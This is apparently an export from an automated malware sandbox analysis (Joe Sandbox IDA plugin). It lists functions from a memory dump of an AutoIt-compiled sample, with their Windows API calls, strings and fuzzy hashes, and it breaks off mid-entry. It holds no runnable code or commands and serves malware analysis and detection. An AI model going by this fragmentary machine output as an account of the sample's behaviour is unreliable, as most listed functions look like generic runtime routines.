Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d65038279d7b2a9b8aef8861f0e026162d658a4608f65d050aecf55eadc362b4
Instruction ID: 8aa699af09c8c264f4a63ec8e59012441ccccd392ebebb9a70d3791f572f8fd1
Opcode Fuzzy Hash: d65038279d7b2a9b8aef8861f0e026162d658a4608f65d050aecf55eadc362b4
Instruction Fuzzy Hash: 17110C7240020CBFDB029F90DC48E9A7FADEB04354F148051FA195A160DBB1AE55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF081A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 35c33b274172612703e2fe6028654450af9c1c29703172a4dd1c5e004a3a5309
Instruction ID: 6f6d81ff36b7f7872d6528ae3be76866c9509e20cbf05c867af738020ae9df01
Opcode Fuzzy Hash: 35c33b274172612703e2fe6028654450af9c1c29703172a4dd1c5e004a3a5309
Instruction Fuzzy Hash: 090148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847941C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00F359A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F359B4
SendMessageTimeoutW.USER32 ref: 00F359CA
GetWindowThreadProcessId.USER32(?,?), ref: 00F359D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F359F9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 247c7ca3805fe968af9ce586b017c3f109b62a1d393959198442a2091d49b080
Instruction ID: eb632b2ae8c855c6594ac2328adbab707e1152157f216d4cd2533df9609c67db
Opcode Fuzzy Hash: 247c7ca3805fe968af9ce586b017c3f109b62a1d393959198442a2091d49b080
Instruction Fuzzy Hash: A3F03A3264115CBBE7215B92DC0EEEF7B7CEFCBB22F100159FA1591050EBE11A11A6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00F377EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00F377FE
EnterCriticalSection.KERNEL32(?,?,00EDC2B6,?,?), ref: 00F3780F
TerminateThread.KERNEL32(00000000,000001F6,?,00EDC2B6,?,?), ref: 00F3781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EDC2B6,?,?), ref: 00F37829

Part of subcall function 00F371F0: CloseHandle.KERNEL32(00000000,?,00F37836,?,00EDC2B6,?,?), ref: 00F371FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00F3783C
LeaveCriticalSection.KERNEL32(?,?,00EDC2B6,?,?), ref: 00F37843

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4c2bc7cabb500d0c127a2f56fb321da1e61dd3c4b6de9c129907b6aa9872a2fb
Instruction ID: cda87eefc999729408030c09405ff07d59744f18f87a0358950be1d1ea28cd4c
Opcode Fuzzy Hash: 4c2bc7cabb500d0c127a2f56fb321da1e61dd3c4b6de9c129907b6aa9872a2fb
Instruction Fuzzy Hash: 76F05E72555216ABD7212B64EC8DAEB7729FF45712F240821F102950A0CFF55801FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F29555
UnloadUserProfile.USERENV(?,?), ref: 00F29561
CloseHandle.KERNEL32(?), ref: 00F2956A
CloseHandle.KERNEL32(?), ref: 00F29572
GetProcessHeap.KERNEL32(00000000,?), ref: 00F2957B
HeapFree.KERNEL32(00000000), ref: 00F29582

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: e2d21c1467467fe3f8b90f9154994381df354c3b0bd5f598922fefbc60ee7c74
Instruction ID: 1d8cfff46190199c4fdc5bd13f62343e7a40552918f130a4ce3d8fc6a734555e
Opcode Fuzzy Hash: e2d21c1467467fe3f8b90f9154994381df354c3b0bd5f598922fefbc60ee7c74
Instruction Fuzzy Hash: 89E0E536004109BBDB021FE1EC0C95BBF39FF4A722B204620F22581170CFB2A460FB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F48CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F48CFD
CharUpperBuffW.USER32(?,?), ref: 00F48E0C
VariantClear.OLEAUT32(?), ref: 00F48F84

Part of subcall function 00F37B1D: VariantInit.OLEAUT32(00000000), ref: 00F37B5D
Part of subcall function 00F37B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00F37B66
Part of subcall function 00F37B1D: VariantClear.OLEAUT32(00000000), ref: 00F37B72

Strings

Incorrect Parameter format, xrefs: 00F48D35, 00F48EF7
AUTOIT.ERROR, xrefs: 00F48E12

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 249f0de96dcaaa5a3bddb870f5400229956f87f513c6241a7b764177616d9b87
Instruction ID: 72fc06fb3ba82b19fad662716383bdc1bdd59c285c27d25ccc0433ca1f0849ca
Opcode Fuzzy Hash: 249f0de96dcaaa5a3bddb870f5400229956f87f513c6241a7b764177616d9b87
Instruction Fuzzy Hash: 66919D71A083019FC710DF24C48095EBBF5EF99354F14896EF89A9B3A2DB30E946DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F3323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D

_memset.LIBCMT ref: 00F3332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F3335D
SetMenuItemInfoW.USER32 ref: 00F33410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F3343E

Strings

0, xrefs: 00F3331A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: d213abdb83d0edf4a7049094a8f646cd32199305c3f28f3fa3befc0a2541f93a
Instruction ID: 965333c013d09572fa26f7eaf9a297a6f3685d1b3224659a3e0b762d8ae2ad51
Opcode Fuzzy Hash: d213abdb83d0edf4a7049094a8f646cd32199305c3f28f3fa3befc0a2541f93a
Instruction Fuzzy Hash: 9851D031A083059BD716EF28C84566BB7E8AF45730F044A2DF895E31E1DB70DE44EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F39B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00EE4A8C: _fseek.LIBCMT ref: 00EE4AA4

Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DE1
Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DF4

_free.LIBCMT ref: 00F39C5F
_free.LIBCMT ref: 00F39C66
_free.LIBCMT ref: 00F39CD1

Part of subcall function 00EF2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9C54,00000000,00EF8D5D,00EF59C3), ref: 00EF2F99
Part of subcall function 00EF2F85: GetLastError.KERNEL32(00000000,?,00EF9C54,00000000,00EF8D5D,00EF59C3), ref: 00EF2FAB

_free.LIBCMT ref: 00F39CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00F39B8F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: f22fbf785f24ff7080a06b429302cc1975fd514017628d7500fa8fc2f6ed517e
Instruction ID: ec3dfdff22759c2383a6ad52b3e75f2eb90cd89b8aad5f36a05dd0f92bd73aec
Opcode Fuzzy Hash: f22fbf785f24ff7080a06b429302cc1975fd514017628d7500fa8fc2f6ed517e
Instruction Fuzzy Hash: 22513EB1D04259AFDF149F65DC45AAEBBB9FF48314F0000AEB259B3241D7715A808F58

Uniqueness

Uniqueness Score: -1.00%

Function 00F32EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F32F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F32F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00F32FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F97890,00000000), ref: 00F33012

Strings

0, xrefs: 00F32F5C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: acf52e22f69d2c1b5be8488761e539567cabc4a8a8005e20d10c4c4bac791334
Instruction ID: 7decb470cf3b837d13a474d58dd7f0614f174838e3c2b0d385401716d9f6e854
Opcode Fuzzy Hash: acf52e22f69d2c1b5be8488761e539567cabc4a8a8005e20d10c4c4bac791334
Instruction Fuzzy Hash: AA41D571604341AFD724DF24CC84B1ABBE4AF84334F14461EF5A5972D1DB70EA05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F4DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4DEAE

Part of subcall function 00EE1462: _memmove.LIBCMT ref: 00EE14B0

Strings

winapi, xrefs: 00F4DF1F
stdcall, xrefs: 00F4DF30
none, xrefs: 00F4DF89
cdecl, xrefs: 00F4DF05

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: ddd630d9bf69c1bcbf2ce9796d0c9f78d6ce0d44dd868eb1943b048f2ab3205a
Instruction ID: 72c4dfbe54cca7dd0771483f435a617a9bd90ff05e8d64a10fc30e2fcedcbf80
Opcode Fuzzy Hash: ddd630d9bf69c1bcbf2ce9796d0c9f78d6ce0d44dd868eb1943b048f2ab3205a
Instruction Fuzzy Hash: D831B270900219AFDF24EF54CC409EEB7B4FF14324B108A69F876A76D2DB31A949DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F29A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F29ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F29ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F29B0F

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Strings

ListBox, xrefs: 00F29A8B
ComboBox, xrefs: 00F29A56

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: f10d213509cce874e01da9d02fbbc1e74efc25b315314efa387c505e7505c261
Instruction ID: 510efc62e1b50d1d18682d43cd2dbb29830234a6c1e7b59a50c2e794dba60e9a
Opcode Fuzzy Hash: f10d213509cce874e01da9d02fbbc1e74efc25b315314efa387c505e7505c261
Instruction Fuzzy Hash: 51210772D05108BEDB14EBA0EC45DFFB7B8DF85360F204119F825A72E1DB794945A620

Uniqueness

Uniqueness Score: -1.00%

Function 00F41EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F41F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F41F6E
InternetCloseHandle.WININET(00000000), ref: 00F41FB5

Part of subcall function 00F42B4F: GetLastError.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B64
Part of subcall function 00F42B4F: SetEvent.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B79

Strings

, xrefs: 00F41F5F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 2be503e33368c5a58c9c234be90c3629c9cbacb282d51d1b5cbe4a9c76881ca2
Instruction ID: 64d99a6dca5bf3e82713a34a8b822ff40e38380d55ace80b287344ccc8251ae7
Opcode Fuzzy Hash: 2be503e33368c5a58c9c234be90c3629c9cbacb282d51d1b5cbe4a9c76881ca2
Instruction Fuzzy Hash: 2F21A4B1A0420CBFE7119F64CC85FBF7BEDFB487A4F10412AF90596240DB649D496BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F56A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F56A86
LoadLibraryW.KERNEL32(?), ref: 00F56A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F56AA2
DestroyWindow.USER32(?), ref: 00F56AAA

Strings

SysAnimate32, xrefs: 00F56A61

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 355afac230653a7c19e0e2d784872fc49d69eb73d4c8bbab50017f1397cfac0e
Instruction ID: 5d2fc9c2370b3fd7f0c9cf23f5578b17a889cfc1ba70299b6af267be536a5410
Opcode Fuzzy Hash: 355afac230653a7c19e0e2d784872fc49d69eb73d4c8bbab50017f1397cfac0e
Instruction Fuzzy Hash: 8C21AC71600209ABEF108E64DC80EBB37A8EB59335F908619FF20E31A1D7798C55B760

Uniqueness

Uniqueness Score: -1.00%

Function 00F37357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F37377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F373AA
GetStdHandle.KERNEL32(0000000C), ref: 00F373BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F373F6

Strings

nul, xrefs: 00F373F1

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8202cf145d7f2cb341276806377297aec2ceffd665ed7d23c94a1c93806a1d55
Instruction ID: bc5e7965f8df3f3df15c6cdec1d5ed166d0fdfe3afed0d728e3020dc5b702c29
Opcode Fuzzy Hash: 8202cf145d7f2cb341276806377297aec2ceffd665ed7d23c94a1c93806a1d55
Instruction Fuzzy Hash: 112177B190830AABDB30AF65DC45A9AB7E4AF45730F204A19FCA1D72D0D7B1D854FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F37425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F37444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F37476
GetStdHandle.KERNEL32(000000F6), ref: 00F37487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F374C1

Strings

nul, xrefs: 00F374BC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 02b1c48443d9abf12ff0c6aff2c5d57735d225631dc8a5fd396998da82911e39
Instruction ID: 75459ae4cb5803d86b1783c623325d1b6b58c7a95c767ce0e63d4726d001de26
Opcode Fuzzy Hash: 02b1c48443d9abf12ff0c6aff2c5d57735d225631dc8a5fd396998da82911e39
Instruction Fuzzy Hash: D22181B1908309DBDB30EF68DC45A9A7BA8AF55730F200A19F9A0D72D0DB70E850EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F3B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F3B2EB
__swprintf.LIBCMT ref: 00F3B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F60980), ref: 00F3B342

Strings

%lu, xrefs: 00F3B2FE

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 61a79a04502a672f6f5a04c0c342441399279eca5bb5d4f1eeccb43f18cc035d
Instruction ID: cdb9fcb5bf03f9b9c5adaa1df68bea4a773d371bebcd097a2bdb09ac283a2861
Opcode Fuzzy Hash: 61a79a04502a672f6f5a04c0c342441399279eca5bb5d4f1eeccb43f18cc035d
